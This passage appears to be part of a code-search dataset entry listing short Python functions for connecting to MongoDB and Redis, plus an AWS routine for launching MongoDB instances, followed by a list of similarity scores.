document_class=son.SON,\r\n **kwargs\r\n ),\r\n db\r\n )\r\n\r\n if user is not None and password is not None:\r\n self.database.authenticate(user, password)\r\n\r\n self.course_index = self.database[collection + '.active_versions']\r\n self.structures = self.database[collection + '.structures']\r\n self.definitions = self.database[collection + '.definitions']\r\n\r\n # every app has write access to the db (v having a flag to indicate r/o v write)\r\n # Force mongo to report errors, at the expense of performance\r\n # pymongo docs suck but explanation:\r\n # http://api.mongodb.org/java/2.10.1/com/mongodb/WriteConcern.html\r\n self.course_index.write_concern = {'w': 1}\r\n self.structures.write_concern = {'w': 1}\r\n self.definitions.write_concern = {'w': 1}", "def reconnect(self):\n self.test_cmd()\n if not self.check_network: \n self.reset()\n attempt=0\n while not self.check_network and attempt<self.retries:\n self.full_reset()\n attempt+=1", "def __init_db(self, db_name):\n\t\tclient = pymongo.MongoClient(self.__db_url)\n\t\treturn client[db_name]", "def install_mongo ( vpc_conn, ec2_conn, cloudwatch_conn, vpc, base_name, aws_account_type, base_topicarn, params ):\n app_type = 'MONGO'\n mongo_keypair = get_keypair_name( aws_account_type, vpc.region.name, app_type )\n print mongo_keypair\n mongo_sec_grp_name = get_secgrp_name( base_name, app_type )\n \n print \"mongo_sec_grp_name\" + mongo_sec_grp_name\n \n mongo_sec_grp = find_secgrp(ec2_conn, mongo_sec_grp_name)\n print mongo_sec_grp\n \n if not mongo_sec_grp :\n mongo_sec_grp = create_secgrp( ec2_conn,\n vpc,\n mongo_sec_grp_name,\n 'Controls access to the ' + app_type )\n print mongo_sec_grp \n \n remove_all_rules( ec2_conn, [ mongo_sec_grp ],deep = True,base_name = base_name)\n grant_ssh_access( ec2_conn, [ mongo_sec_grp ], find_group( ec2_conn, base_name, 'NAT' ) )\n grant_grp_self_access ( ec2_conn, mongo_sec_grp, 0, 65535, protocol = 'tcp' )\n \n 
mongo_ami_name = base_name + '-' + app_type\n \n mongo_ami = get_ami_by_name( ec2_conn, mongo_ami_name )\n if not mongo_ami :\n mongo_ami = get_ami_by_name( ec2_conn, default_mongo_ami )\n\n print \"Creating mongoDB Instances\"\n \n mongo_subnets = get_vpc_subnets( vpc_conn, vpc, 'STATIC' )\n mongo_sec_grps = ec2_conn.get_all_security_groups( filters = { \"group-name\" : [ mongo_sec_grp_name ] } )\n \n primary_ip = get_primary_node(mongo_subnets)\n mongo_instances = []\n mongo_config = get_mongo_config(mongo_subnets)\n \n user_data = None\n primary_instance_id = None\n primary_subnet = None\n for subnet in mongo_subnets :\n cidr_block = subnet.cidr_block\n \n if cidr_block == primary_ip :\n primary_subnet = subnet\n \n # First launch the secondary instances\n if cidr_block != primary_ip :\n instance_private_ip = get_static_ip(subnet.cidr_block, \"0/24\", mongo_ip_block)\n zone_letter = subnet.availability_zone[-1:].upper( )\n mongo = launch_instance_vpc( ec2_conn,\n mongo_ami,\n base_name = base_name,\n instance_type = app_type,\n keypair = mongo_keypair,\n machine_type = 'm3.xlarge',\n security_group_id = mongo_sec_grps[0].id ,\n subnet_id = subnet.id,\n public_ip = False,\n user_data = user_data,\n static_ip_address = instance_private_ip )\n mongo_instances.append( mongo )\n\n print \"Setting alarms on the mongo instance\"\n add_monitors_to_instance( cloudwatch_conn, base_name, mongo.id, app_type, base_topicarn, mongo_monitor_rules )\n\n user_data = base64.b64encode(mongo_config)\n \n print \"Launching primary mongo instance\"\n print \"primary_subnet \" +primary_subnet.cidr_block\n instance_private_ip = get_static_ip(primary_subnet.cidr_block, \"0/24\", mongo_ip_block)\n zone_letter = subnet.availability_zone[-1:].upper( )\n mongo = launch_instance_vpc( ec2_conn,\n mongo_ami,\n base_name = base_name,\n instance_type = app_type,\n keypair = mongo_keypair,\n machine_type = 'm3.xlarge',\n security_group_id = mongo_sec_grps[0].id ,\n subnet_id = primary_subnet.id,\n public_ip = False,\n user_data = user_data,\n static_ip_address = instance_private_ip )\n mongo_instances.append( mongo)\n \n print \"Setting alarms on the mongo instance\"\n add_monitors_to_instance( cloudwatch_conn, base_name, mongo.id, app_type, base_topicarn, mongo_monitor_rules )", "def _connect_to_mongo_port(port):\r\n \r\n sock = socket.socket()\r\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\r\n sock.settimeout(1)\r\n sock.connect((\"localhost\", int(port)))\r\n sock.close()", "def __init__(self, host='127.0.0.1', port=27017, handle_error=False):\n self.host = host\n self.port = port\n self.connection = None\n self.handle_error = handle_error", "def _reset_session(self):\n retries = self.__no_of_retries\n\n while retries > 0:\n if not self._is_session_valid():\n self._close()\n self._set_session()\n else:\n break\n retries -= 1\n else:\n raise DatabaseError.ConnectionError(\"Connection to database not available!\")", "def populateMongoDB():\n client = MongoClient()\n db = client.test\n collection = db.test_collection\n collection.delete_many({})\n print(\"populating mongoDB...\")\n sites = readBrowserHistory()\n for site in sites:\n predict(db, site)\n client.close()", "def work(self):\n self.config_file = self.args.config\n self.init_config()\n self.init_db()\n\n self.kickoff()", "def setup(self):\n\t\ttry:\n\t\t\tdatabase = redis.StrictRedis(host=self.HOST, port=self.PORT, db=self.DB)\n\n\t\t\tself.logger.info(\"Successfully established Redis connection.\")\n\n\t\t\treturn database\n\n\t\texcept 
redis.exceptions.ConnectionError as err:\n\t\t\traise err", "def mmo_is_mongo_up(self, hostname, port=27017):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n service_up = False\n try:\n s.connect((hostname, port))\n service_up = True\n s.close()\n except socket.error as e:\n pass\n except Exception as e:\n raise e\n return service_up", "def init_connection(self, db):\n log.info(\"== Stage 1: Init ==\")\n self.use_db(db)\n self.set_no_binlog()\n self.get_mysql_settings()\n self.init_mysql_version()\n self.sanity_checks()\n self.set_tx_isolation()\n self.set_sql_mode()\n self.enable_priority_ddl()\n self.skip_cache_fill_for_myrocks()\n self.enable_sql_wsenv()\n self.override_session_vars()\n self.get_osc_lock()", "async def _get_pymongo_instance(app: web.Application , url) -> None:\n try:\n log.info(f'Getting pymongo instance')\n mongo_instance = dict()\n _cli = MongoClient(url)\n mongo_instance['client'] = _cli\n mongo_instance['db'] = _cli['versiondb']\n app['mongo'] = mongo_instance\n await asyncio.sleep(1)\n\n except Exception as e:\n\n log.error(f'_get_pymongo_instance {e}')\n raise e", "def __init__(self, dbname='cards'):\n\n self._client = MongoClient()\n self._db = self._client[dbname]\n self._collection = self._db[dbname]\n self._keys = ['set', 'color', 'text', 'creator']", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(\n self,\n client: pymongo.MongoClient,\n database_name: str,\n session_id: uuid.UUID,\n ):\n self.mongo_client = client\n self.session_id = session_id\n self.mongo_database = client.get_database(database_name)", "def prepare_buy(self):\n self.redisHandle.connect_redis(\"localhost\")\n # [TODO] check return value", "def database_connectivity():\n\n port = \"mongodb://localhost:27017/\"\n client = pymongo.MongoClient(host=port)\n\n db = client[\"Password_Manager\"]\n collection = db[\"Passwords\"]\n\n return collection" ]
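The negative snippets above are mostly variations on one pymongo pattern: build a MongoClient, optionally authenticate, and take a database/collection handle from it. A minimal sketch of that shared pattern follows; the host, port, credentials, and database/collection names are placeholders and are not taken from any of the entries above.

from pymongo import MongoClient

def get_collection(host="localhost", port=27017, user=None, password=None,
                   db_name="test", collection_name="events"):
    # Placeholder connection details -- not values from the entries above.
    if user and password:
        uri = f"mongodb://{user}:{password}@{host}:{port}/"
    else:
        uri = f"mongodb://{host}:{port}/"
    client = MongoClient(uri)
    return client[db_name][collection_name]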
[ "0.70171124", "0.68669546", "0.6740658", "0.6647585", "0.6619428", "0.6484099", "0.6464825", "0.6440319", "0.6433522", "0.6415763", "0.6397156", "0.6346596", "0.6345212", "0.62915", "0.6224574", "0.61763144", "0.61705923", "0.6150122", "0.6147837", "0.613134", "0.60872823", "0.60645425", "0.6053271", "0.60391504", "0.6031125", "0.59661055", "0.59654367", "0.5933904", "0.5931982", "0.59276146", "0.5905916", "0.5873731", "0.58670795", "0.5851349", "0.5834826", "0.5833121", "0.5798111", "0.57308143", "0.57206386", "0.5694944", "0.5691278", "0.5676863", "0.5675909", "0.56737375", "0.56618094", "0.5652388", "0.56522053", "0.5642387", "0.5622988", "0.56194735", "0.56156784", "0.5610888", "0.5610588", "0.55984205", "0.55890137", "0.5584256", "0.5563932", "0.5559973", "0.55494314", "0.5532938", "0.5504866", "0.5499264", "0.5497624", "0.5492155", "0.54858595", "0.54832923", "0.5481011", "0.54788226", "0.5456368", "0.5455903", "0.5447397", "0.54411685", "0.54331964", "0.5432086", "0.543102", "0.5424725", "0.54170173", "0.5412443", "0.5411402", "0.54069865", "0.5404397", "0.5403477", "0.540324", "0.54025316", "0.53897077", "0.5384297", "0.53766155", "0.53697085", "0.5367396", "0.53667456", "0.53623396", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.53485465", "0.5330509", "0.5316453" ]
0.6147428
19
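Taken together, the score fields above appear to fit a simple relationship: document_rank looks like the number of negatives whose score exceeds document_score (19 of the negative_scores listed above are greater than 0.6147428). That reading is an inference from this one row, not a documented definition. A sketch under that assumption:

def document_rank(document_score, negative_scores):
    # Count how many negatives the retriever scored above the document.
    return sum(1 for score in negative_scores if score > document_score)

# For the row above, comparing 0.6147428 against its negative_scores
# yields 19, matching the stored document_rank.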
Open a tab delimited file and return links and time
def parser(list_of_text): # Youtube link regex yt_link = re.compile(r"http(s)?:\/\/www\.youtu.*") pron_link = re.compile(r".*pornhub.*") pic_link = re.compile(r"^http(s)?:\/\/.*jpg.*") pics = [link.split() for link in list_of_text if re.match(pic_link, link)] found_yt_links = [line.split() for line in list_of_text if re.match(yt_link, line)] found_pron = [line.split() for line in list_of_text if re.match(pron_link, line)] joined_links = found_yt_links + found_pron return joined_links, pics
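The stored document for this query operates on lines that have already been read into a list and returns only the matched link tokens; it does not open a file or return timestamps itself. Below is a minimal sketch of what the query text literally describes, assuming a tab-delimited layout with the timestamp in the first column and the URL in the second; that layout is a guess, not something stated in the row above.

import csv
import re

URL_RE = re.compile(r"https?://\S+")

def links_and_times(path):
    # Assumed layout: column 0 = timestamp, column 1 = URL (a guess).
    links, times = [], []
    with open(path, newline="") as handle:
        for row in csv.reader(handle, delimiter="\t"):
            if len(row) < 2:
                continue
            timestamp, candidate = row[0], row[1]
            if URL_RE.match(candidate):
                links.append(candidate)
                times.append(timestamp)
    return links, times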
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readTab(file_name):\n data = []\n meta = []\n l=0\n for line in open(file_name):\n if l<3:\n meta.append(line.strip(\"\\n\").split(\"\\t\"))\n else:\n if len(line.strip(\"\\n\").split(\"\\t\")) == len(meta[0]):\n data.append(line.strip(\"\\n\").split(\"\\t\"))\n l += 1\n return (meta, data)", "def readFile(filename, sep=',', fformat=\"TEDGE\", timestampformat=\"%s\", maxlines=sys.maxsize):\n \n assert filename is not \"\"\n assert (fformat is \"TEDGE\") or (fformat is \"TRIGRAM\")\n \n with open(filename, 'r') as f:\n tedges = []\n twopaths = []\n \n header = f.readline()\n header = header.split(sep)\n\n # We support arbitrary column ordering, if header columns are included\n time_ix = -1\n source_ix = -1\n mid_ix = -1\n weight_ix = -1\n target_ix = -1\n if fformat ==\"TEDGE\":\n for i in range(len(header)):\n header[i] = header[i].strip()\n if header[i] == 'node1' or header[i] == 'source':\n source_ix = i\n elif header[i] == 'node2' or header[i] == 'target':\n target_ix = i\n elif header[i] == 'time' or header[i] == 'timestamp':\n time_ix = i\n elif fformat ==\"TRIGRAM\":\n # For trigram files, we assume a default of (unweighted) trigrams in the form source;mid;target\n # Any other ordering, as well as the additional inclusion of weights requires the definition of \n # column headers in the data file!\n source_ix = 0\n mid_ix = 1\n target_ix = 2\n for i in range(len(header)):\n header[i] = header[i].strip()\n if header[i] == 'node1' or header[i] == 'source':\n source_ix = i \n elif header[i] == 'node2' or header[i] == 'mid':\n mid_ix = i\n elif header[i] == 'node3' or header[i] == 'target':\n target_ix = i\n elif header[i] == 'weight':\n weight_ix = i \n\n assert( (source_ix >= 0 and target_ix >= 0) or\n (source_ix >= 0 and mid_ix >= 0 and target_ix >= 0 and weight_ix >= 0)), \"Detected invalid header columns: %s\" % header\n\n if time_ix<0:\n Log.add('No time stamps found in data, assuming consecutive links', Severity.WARNING)\n \n # Read time-stamped links\n if fformat == \"TEDGES\":\n Log.add('Reading time-stamped links ...')\n else:\n Log.add('Reading trigram data ...')\n\n line = f.readline()\n n = 1 \n while line and n <= maxlines:\n fields = line.rstrip().split(sep)\n if fformat ==\"TEDGE\":\n try:\n if time_ix >=0:\n timestamp = fields[time_ix] \n if timestamp.isdigit():\n t = int(timestamp)\n else:\n x = dt.datetime.strptime(timestamp, \"%Y-%m-%d %H:%M\")\n t = int(time.mktime(x.timetuple()))\n else:\n t = n \n if t>=0:\n tedge = (fields[source_ix], fields[target_ix], t)\n tedges.append(tedge)\n else:\n Log.add('Ignoring negative timestamp in line ' + str(n+1) + ': \"' + line.strip() + '\"', Severity.WARNING)\n except (IndexError, ValueError):\n Log.add('Ignoring malformed data in line ' + str(n+1) + ': \"' + line.strip() + '\"', Severity.WARNING)\n\n elif fformat ==\"TRIGRAM\":\n source = fields[source_ix].strip('\"')\n mid = fields[mid_ix].strip('\"')\n target = fields[target_ix].strip('\"')\n if weight_ix >=0: \n weight = float(fields[weight_ix].strip('\"'))\n else:\n weight = 1\n tp = (source, mid, target, weight)\n twopaths.append(tp)\n\n line = f.readline()\n n += 1\n # end of with open()\n \n Log.add('finished.')\n if fformat == \"TEDGE\": \n return tn.TemporalNetwork(tedges = tedges, sep=sep)\n elif fformat ==\"TRIGRAM\":\n # If trigram data did not contain a weight column, we aggregate\n # multiple occurrences to weighted trigrams\n if weight_ix < 0: \n Log.add('Calculating trigram weights ...')\n tp_dict = defaultdict( lambda: 0)\n for trigram in twopaths:\n tp = 
(trigram[0], trigram[1], trigram[2])\n tp_dict[tp] = tp_dict[tp] + trigram[3]\n twopaths = []\n for tp in tp_dict.keys():\n twopaths.append((tp[0], tp[1], tp[2], tp_dict[tp]))\n Log.add('finished.')\n return tn.TemporalNetwork(twopaths = twopaths, sep=sep)", "def load_tweets(fp):\r\n ans = pd.read_csv(fp, sep='\\t')\r\n return ans", "def read_tsv(data_loc, fname):\n tf = codecs.open(data_loc + fname, 'r', encoding='utf-8')\n data = []\n labels = []\n fnames = []\n for line in tf:\n (ifname, label) = line.strip().split(\"\\t\")\n content = read_instance(data_loc, ifname)\n labels.append(label)\n fnames.append(ifname)\n data.append(content)\n tf.close()\n return data, fnames, labels", "def read_data(file):\n data = pd.read_csv('facebook-links.txt.anon', delimiter=\"\\t\", header=None)\n data.columns = ['user', 'user_friend_list', 'time']\n return data", "def parse_file(file_path, separator='\\t'):\n\n\ttable = []\n\twith open(file_path) as file:\n\t\tfor line in file:\n\t\t\t# Remove newline character.\n\t\t\tline = line.rstrip('\\n')\n\t\t\t\n\t\t\t# Parse the line.\n\t\t\trow = line.split(separator)\n\n\t\t\ttable.append(row)\n\n\treturn table", "def parse_timetable(filename, behaviour_on_unsupported_data = \"once\", behaviour_on_unrecognised_data = \"once\"):\n\n filterwarnings(behaviour_on_unsupported_data, \".*\", UnsupportedWarning)\n filterwarnings(behaviour_on_unrecognised_data, \".*\", UnrecognisedWarning)\n\n transaction_types = {\"N\": \"new\",\n \"D\": \"delete\",\n \"R\": \"revise\"}\n\n days = [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n\n\n with open(filename,'r') as f:\n header = None\n\n for l in f:\n record_type = l[:2]\n\n if record_type == \"HD\":\n # Header\n d = {}\n d[\"user_identity\"] = l[7:13]\n d[\"user_date\"] = date_yymmdd(l[16:22])\n d[\"extracted_time\"] = datetime_ddmmyyhhmm(l[22:32])\n d[\"current_reference\"] = l[32:39].strip()\n d[\"previous_reference\"] = l[39:46].strip()\n d[\"full\"] = (l[46] == 'F')\n d[\"version\"] = l[47]\n d[\"extract_start\"] = date_ddmmyy(l[48:54])\n d[\"extract_end\"] = date_ddmmyy(l[54:60])\n if header is not None:\n warn(\"Two header fields: overwriting the first\", WeirdBehaviour)\n header = d\n\n elif record_type == \"BS\":\n # basic schedule\n d = {}\n d[\"type\"] = transaction_types[l[2]]\n d[\"uid\"] = l[3:9]\n d[\"date_runs_from\"] = date_yymmdd(l[9:15])\n if l[15:21] == \"999999\":\n d[\"date_runs_to\"] = None\n else:\n d[\"date_runs_to\"] = date_yymmdd(l[15:21])\n\n d[\"days_run\"] = dict(zip(days,(c == \"1\" for c in l[21:28])))\n\n bhx = l[28].strip()\n if bhx:\n d[\"bank_holiday_running\"] = bhx\n if bhx not in Timetable.bhx:\n warn(\"bank holiday running code = %r\"%(bhx,),UnrecognisedWarning)\n\n status = l[29].strip()\n if status:\n d[\"train_status\"] = status\n if status not in Timetable.status:\n warn(\"status = %r\"%(status,),UnrecognisedWarning)\n\n category = l[30:32].strip()\n if category:\n d[\"category\"] = category\n if category not in Timetable.category:\n warn(\"category = %r\"%(category,),UnrecognisedWarning)\n\n d[\"train_identity\"] = l[32:36].strip()\n d[\"headcode\"] = l[36:40]\n d[\"train_service_code\"] = l[41:49]\n d[\"portion_id\"] = l[49]\n\n power_type = l[50:53].strip()\n if power_type:\n d[\"power_type\"] = power_type\n if power_type not in Timetable.power_type:\n warn(\"power_type = %r\"%(power_type,),UnrecognisedWarning)\n d[\"timing_load\"] = l[53:57].strip() # should validate this\n\n d[\"speed\"] = int(l[57:60].strip() or 0)\n\n operating_chars = 
list(l[60:66].strip())\n d[\"operating_chars\"] = operating_chars\n for c in operating_chars:\n if c not in Timetable.operating_chars:\n warn(\"operating_chars has %r\"%(c,),UnrecognisedWarning)\n\n train_class = l[66].strip() or \"B\"\n d[\"train_class\"] = train_class\n if train_class not in Timetable.train_class:\n warn(\"train_class = %r\"%(train_class,),UnrecognisedWarning) \n sleepers = l[67].strip()\n if sleepers:\n d[\"sleepers\"] = sleepers\n if sleepers not in Timetable.sleepers:\n warn(\"sleepers = %r\"%(sleepers,),UnrecognisedWarning)\n\n reservations = l[68].strip()\n if reservations:\n d[\"reservations\"] = reservations\n if reservations not in Timetable.reservations:\n warn(\"reservations = %r\"%(sleepers,),UnrecognisedWarning)\n\n catering = list(l[69:73].strip())\n d[\"catering\"] = catering\n for c in catering:\n if c not in Timetable.catering:\n warn(\"catering has %r\"%(c,),UnrecognisedWarning)\n\n service_branding = list(l[73:77].strip())\n d[\"service_branding\"] = service_branding\n for c in service_branding:\n if c not in Timetable.service_branding:\n warn(\"service_branding has %r\"%(c,),UnrecognisedWarning)\n\n\n else:\n warn(\"record type %r\"%(record_type,), UnsupportedWarning)\n # warn(\"record type %r\"%(record_type,), UnrecognisedWarning)", "def parse_file(file):\n for line in open(file,'r'):\n line = line.strip()\n token = line.split('\\t')\n ### loop through ids in second column and print with first columns \n for item in token[1].split(','):\n print item+'\\t'+token[0]", "def load_data(filename):\n hkas = HKArchiveScanner()\n hkas.process_file(filename)\n cat = hkas.finalize()\n fields, timelines = cat.get_data(['position'], short_match=True)\n return fields, timelines", "def read_tab_delim_file(fname):\n file_paths = []\n with open(fname, 'r') as f:\n # next(f) # skip headings\n reader = csv.reader(f, delimiter='\\t')\n for path in reader:\n file_paths.append(path)\n return file_paths", "def import_files_table(path):\n return pd.read_csv(path, sep=\"\\t\", skiprows=1, header=0)", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _readin_chrome_history(file):\n\tcon = lite.connect(file)\n\tcontent = []\n\twith con:\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT visits.id, urls.url, datetime(visits.visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch'), * FROM urls, visits WHERE urls.id = visits.url;\")\n\t\trows = cur.fetchall()\n\t\tsources = []\n\t\tfor row in rows:\n\t\t\t_print_progress(rows.index(row))\n\t\t\tdate = datetime.datetime.strptime(row[2],\"%Y-%m-%d %H:%M:%S\")\n\t\t\tsource = ''\n\t\t\tpattern = re.compile(r'.*(www\\.|http[s]{0,1}:\\/\\/)([^\\.]+)\\..*')\n\t\t\tm = pattern.match(row[1])\n\t\t\tif m:\n\t\t\t\tsource = m.group(2)\n\t\t\t\tif not source in sources:\n\t\t\t\t\tsources.append(source)\n\t\t\tcontent.append(logfile_entry(row[0], file, row[1], row[3:], date, '', source))\n\t_delete_print()\n\treturn logfile(file, len(content), 'firefox_sqlite', content, sources)", "def open_txt_table(txt_file, data_start_with=2,keys_line=0, types_line=1, split_char=\"\\t\"):\n file = open(txt_file,\"r\")\n i = 0;\n line = file.readline()\n keys = []\n types = []\n txt_table_rows = []\n while line != \"\":\n line = line.strip(\"\\n\")\n line = line.strip(\"\\r\")\n if(i >= data_start_with):\n values = line.split(split_char)\n n = len(values)\n 
values += [\" \" for x in range(len(keys) - n)]\n txt_table_rows.append(\n TxtTableRow(keys, values, types)\n )\n elif(i==keys_line):\n keys = line.split(split_char)\n elif(i == types_line):\n types = line.split(split_char)\n i += 1\n line = file.readline()\n\n file.close()\n return txt_table_rows", "def table_tags(filen):\n\n print(\"Scanning file \" + str(filen))\n rtable = re.compile(r\"\\$TABLE *:\")\n f = open(filen, \"r\")\n linecount = 0\n tablecount = 0\n tablelist = []\n for line in f:\n linecount = linecount + 1\n table = rtable.search(line)\n if table:\n tablecount = tablecount + 1\n print(str(linecount) + \": \" + str(line.rstrip(\"\\n\")))\n tablelist.append(line.rstrip(\"\\n\"))\n f.close()\n print(str(linecount) + \" lines and \" + str(tablecount) + \" tables\")\n return tablelist", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def parse_file(filename='activity_1321393768.tcx'):\n\n # tree = etree.parse(filename)\n tree = getattr(etree, 'parse')(filename)\n xmlstr = '{http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2}'\n points = tree.findall('//'+xmlstr+'Trackpoint')\n # dist = [r.find(xmlstr+'DistanceMeters').text for r in points]\n heart = [int(r.find(xmlstr+'HeartRateBpm')[0].text) for r in points]\n speed = [float(r.find(xmlstr+'Extensions')[0][0].text) for r in points]\n pace = [float(curr)*3600/1000 for curr in speed]\n time = range(0, len(speed))\n return (time, heart, pace)", "def parse():\n values = []\n for file in os.listdir('/tmp/street_data/'): \n with open('/tmp/street_data/' + file, 'r') as f:\n data = f.readlines()\n data = ''.join(data)\n soup = BeautifulSoup(data)\n tables = soup.findAll('table') \n for table in tables:\n print(table)\n time = table.find('eventtime')\n lat = table.find('latitude')\n long = table.find('longitude')\n values.append({'lat': lat, 'long': long, 'time': time})\n print(lat,long,time)\n return values", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def readFileTable(f, header):\n version, dataOffset, archiveFileCount, fileTableLength, endianness, fileCount = header\n \n def readFileRecords(f):\n for i in range(fileCount):\n recordBytes = f.read(FILE_RECORD_LENGTH)\n path, offset, size, endianness, archiveFileIndex = struct.unpack(\"<256sLLLL\", recordBytes)\n path, _ = path.decode('ascii').split(\"\\0\", 1)\n yield (path, offset, size, endianness, archiveFileIndex)\n \n return list(readFileRecords(f))", "def read_changes_tsv(tsv_file):\r\n changes = {}\r\n with open(tsv_file, 'r') as info_file:\r\n for info in info_file:\r\n split_info = info.strip().split('/t')\r\n changes[split_info[0]] = split_info[1]\r\n return changes", "def read_traffic(filename, fields=[], display_filter=\"\", \n timeseries=False, strict=False):\n if timeseries:\n fields = [\"frame.time_epoch\"] + fields\n fieldspec = \" \".join(\"-e %s\" % f for f in fields)\n\n display_filters = fields if strict else []\n if display_filter:\n display_filters.append(display_filters)\n filterspec = \"-Y '%s'\" % \" and \".join(f for f in display_filters)\n\n options = \"-r %s -n -T fields -Eheader=y\" % filename\n cmd = 
\"tshark %s %s %s\" % (options, filterspec, fieldspec)\n print (cmd)\n proc = subprocess.Popen(cmd, shell = True, \n stdout=subprocess.PIPE)\n if timeseries:\n df = pd.read_table(proc.stdout, \n index_col = \"frame.time_epoch\", \n parse_dates=True, \n date_parser=mydateparser)\n else:\n df = pd.read_table(proc.stdout)\n \n return df", "def file_info(self, f):\n ld8 = self.ld8_extract(f) # get luna_date\n sid = self.sesid(ld8) # make luna_visitnum\n age = self.age_lookup.get(sid)\n return (sid, age)", "def load_timestamps(ts_file):\n ts = []\n with open(ts_file, 'r') as f:\n for line in f.readlines():\n line = line.split()\n if line[0] != \"#\":\n ts.append(line)\n\n return ts", "def find_timespan(f):\n open_file = pd.read_csv(f)\n return int(open_file.keys()[0]), int(open_file.keys()[-1])", "def download_table(filepath: Path, url: str, get_time=False):\n if not filepath.exists():\n if url.lower().endswith('zip'):\n import zipfile, requests, io\n table_request = requests.get(url).content\n zip_file = zipfile.ZipFile(io.BytesIO(table_request))\n zip_file.extractall(filepath)\n elif 'xls' in url.lower() or url.lower().endswith('excel'):\n import shutil\n try:\n with urllib.request.urlopen(url) as response, open(filepath, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except urllib.error.HTTPError:\n log.warning(f'Error downloading {url}')\n elif 'json' in url.lower():\n pd.read_json(url).to_csv(filepath, index=False)\n if get_time:\n try:\n retrieval_time = filepath.stat().st_ctime\n except OSError:\n retrieval_time = time.time()\n return time.ctime(retrieval_time)\n elif get_time:\n return time.ctime(filepath.stat().st_ctime)", "def read_frame_trajectory_file( filename ):\n file = open(filename, \"r\")\n\n timestamps = list()\n path = list()\n\n for line in file:\n # eliminate leading spaces\n line = line.strip()\n\n # ignore comments and empty lines\n if len(line) == 0 or line[0] == '#':\n continue\n\n # divide on whitespace and convert to numbers\n nums = [float(x) for x in line.split()]\n \n # separate out components and build lists\n\n timestamps.append( nums[0] )\n\n origin = list( nums[1:4] )\n unitx = list( nums[4:7] )\n unity = list( nums[7:10] )\n unitz = list( nums[10:13] )\n\n path.append( list( (origin, unitx, unity, unitz ) ) )\n\n return path, timestamps", "def __openRow(fd):\n\n print(\" <tr>\", file=fd)", "def getLineListing(line_list_url = LINE_LIST_URL, line_list_re = LINE_LIST_RE, base_url = BASE_URL):\n line_list_re = re.compile('<tr.+?<td.+?<a\\shref=\\\"(Sched/\\S+?)\\\".+?<b>(.+?)</b>.+?size=.*?\\\"1\\\">(.+?)</font>.+?size=\\\"2\\\">(.+?)</font>')\n \n html_data = urllib2.urlopen(line_list_url).read().replace('\\n','').replace('\\t','').replace('\\r','') #get rid of unecessary whitespace\n while html_data.find(' ') > -1:\n html_data = html_data.replace(' ', ' ') #HTML doesn't care about multiple spaces, we do\n return data = line_list_re.findall(html_data)", "def parse_line(self, line, time_shift=0.0):\n # The local variables are rather simple.\n # pylint: disable=too-many-locals\n try:\n (\n mode_string,\n nlink,\n user,\n group,\n size,\n month,\n day,\n year_or_time,\n name,\n ) = self._split_line(line)\n # We can get a `ValueError` here if the name is blank (see ticket #69).\n # This is a strange use case, but at least we should raise the\n # exception the docstring mentions.\n except ValueError as exc:\n raise ftputil.error.ParserError(str(exc))\n # st_mode\n st_mode = self.parse_unix_mode(mode_string)\n # st_ino, st_dev, st_nlink, st_uid, st_gid, 
st_size, st_atime\n st_ino = None\n st_dev = None\n st_nlink = int(nlink)\n st_uid = user\n st_gid = group\n st_size = int(size)\n st_atime = None\n # st_mtime\n st_mtime, st_mtime_precision = self.parse_unix_time(\n month, day, year_or_time, time_shift, with_precision=True\n )\n # st_ctime\n st_ctime = None\n # st_name\n if name.count(\" -> \") > 1:\n # If we have more than one arrow we can't tell where the link name\n # ends and the target name starts.\n raise ftputil.error.ParserError(\n '''name '{}' contains more than one \"->\"'''.format(name)\n )\n elif name.count(\" -> \") == 1:\n st_name, st_target = name.split(\" -> \")\n else:\n st_name, st_target = name, None\n stat_result = StatResult(\n (\n st_mode,\n st_ino,\n st_dev,\n st_nlink,\n st_uid,\n st_gid,\n st_size,\n st_atime,\n st_mtime,\n st_ctime,\n )\n )\n # These attributes are kind of \"half-official\". I'm not sure whether\n # they should be used by ftputil client code.\n # pylint: disable=protected-access\n stat_result._st_mtime_precision = st_mtime_precision\n stat_result._st_name = st_name\n stat_result._st_target = st_target\n return stat_result", "def import_table(path_or_reference, get_time=False):\n try:\n df = pd.read_csv(path_or_reference, low_memory=False)\n except urllib.error.URLError as exception:\n log.warning(exception.reason)\n log.info('retrying url...')\n time.sleep(3)\n df = pd.read_csv(path_or_reference, low_memory=False)\n if get_time and isinstance(path_or_reference, Path):\n retrieval_time = path_or_reference.stat().st_ctime\n return df, time.ctime(retrieval_time)\n elif get_time:\n retrieval_time = time.time()\n return df, time.ctime(retrieval_time)\n return df", "def readTxt(path2file, verbose = True):\n\n if (verbose):\n\t print('Parsing file ', path2file)\n\n ret = pd.read_csv(path2file, sep=';', header = None, names = ['Received', 'ExchTime', 'OrderId', 